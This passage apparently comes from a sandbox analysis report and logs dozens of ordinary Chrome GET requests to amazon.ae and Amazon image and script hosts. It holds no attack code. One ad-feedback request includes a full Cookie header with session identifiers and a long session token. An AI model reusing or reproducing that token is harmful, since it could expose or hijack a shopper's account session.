    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259740_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259756_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/61gfdNg8jyL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259749_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71F1yxjGeYL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3JlZj1uYXZfbG9nbz8%3D%22%2C%22adElementId%22%3A%22ape_Gateway_right-2_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22slotName%22%3A%22right-2%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRHKWoaXzh7P4jAXd27JeqmcAAAGRVkKHAQMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICBPaQEf%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=258-1179333-9864664; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=259-0026151-5947772; session-token=E6VpY3m60fUZcb6s8YCvLawniyUbsva8N6eIM6U974LXoVJwSQS+Ipu2nRRVeG2G6JhswsBbyT1i8jzCKv+Ac75i7UrXd7yLPyWJQvOgmrfLF0DC3KMgqrqZknDnVted0FL6kb10JOvNpwsKjRIb/2lITYNAzTyyCN04Or6y8RHZAT5vKBz/ZNuNA/kD7Rwnhx7LP692odU2scBQFICodmh5nsZoBsPeyDo1OUJavQWYKbrL+XHGDZqP3jQrJnGl07Bl+5ZNpdiitmJsxdzfjWdwI0Anq9GsMLV6rSrdrF/MjB7lUF/PBOOJ/F2BZ04vFuDlPFsVZ8fiYkHR6zI+th8f6RVQc1TY; csm-hit=tb:s-1GXSAVZ7MBDVTNT0VYNB|1723729086161&t:1723729087767&adb:adblk_no
    Source: global trafficHTTP traffic detected: GET /images/S/sash/ydDD9hnRfziI$y7.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/614eD8BhoUL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71L9xtDPoLL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/71GWDQsQzaL._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/VAS_MENA/2024/GW/QC/Furniture/XCM_CUTTLE_ORIGIN_1707658_3701318_186x116_1X_en_AE_Version_3._SY116_CB561430975_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/01rGP6HIADL.js?AUIClients/GenericObservableJS HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259758_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/11y85pohsPL._RC%7C41JZmnaIUdL.js_.js?AUIClients/AmazonGatewayAuiAssets HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259737_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610035_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610032_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/31IkFoRynML.js?AUIClients/AmazonGatewayHerotatorJS HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259751_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/411x8BHUrFL._RC%7C71xP0umV4JL.js,01gK5H1EnXL.js,01phmzCOwJL.js,01eOvPdxG7L.js,71xoLvkbbjL.js,41jBieyCvYL.js,01wXnKULArL.js,01+pnQJuQ0L.js,21fcR05bSUL.js,41rnk3z1gYL.js,51H8vCDt+dL.js,31J-NEfNY0L.js,11lEMI5MhIL.js,31+UifI0MIL.js,71-pKfDl0GL.js,41aCLC6fiuL.js,01VYGE8lGhL.js_.js?AUIClients/NavDesktopUberAsset&HUTipDuy HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AHS_UAE/2024/UDS/GW/QC/Furniture/XCM_CUTTLE_1690813_3610033_186x116_1X_en_AE._SY116_CB582137121_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/apesafeframe/ape/la/desktop/ApeDLA-1.50.30136ee2.js?csm_attribution=APE-SafeFrame HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_AllAudio_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/AE-hq/2022/img/Sports/XCM_Manual_1521089_5259736_400x400_2X._CB617696541_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-ezsdz_372x232_ae-en._SY116_CB643136719_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-0zvf9_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-vubbe_372x232_ae-en._SY116_CB643136714_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/home/janiceo/dqc_experiment/xcm_banners_tr_bts21_372x232_pp-d9le7_372x232_ae-en._SY116_CB643136704_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213328_UAE_3151165_153x125_en_AE._SY116_CB428587699_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213331_UAE_3151168_153x125_en_AE._SY116_CB428587699_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_Manual_1224505_1174644_UAE_3096775_153x125_2X_en_AE._SY116_CB431807455_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/UAE-hq/2020/img/Apparel/XCM_CUTTLE_1230335_1213334_UAE_3151164_153x125_en_AE._SY116_CB428587698_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Earphones_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_Gaming_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/electronics/store/kamja/WebQC/2021/Audio/Feb_True_1x._SY116_CB659040113_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/I/51YIzqZ2R5L._AC_SY200_.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07s96bn4y_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07ns817nh_379x304_ae-en._SY116_CB623271885_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/39/kitchen/janiceo/april_new_dqc/xcm_banners_bau_2021_desktop-quadcard_b07nsb535l_379x304_ae-en._SY116_CB623271922_.jpg HTTP/1.1Host: images-eu.ssl-images-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /images/G/01/ad-feedback/info_icon_1Xsprite.png HTTP/1.1Host: m.media-amazon.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
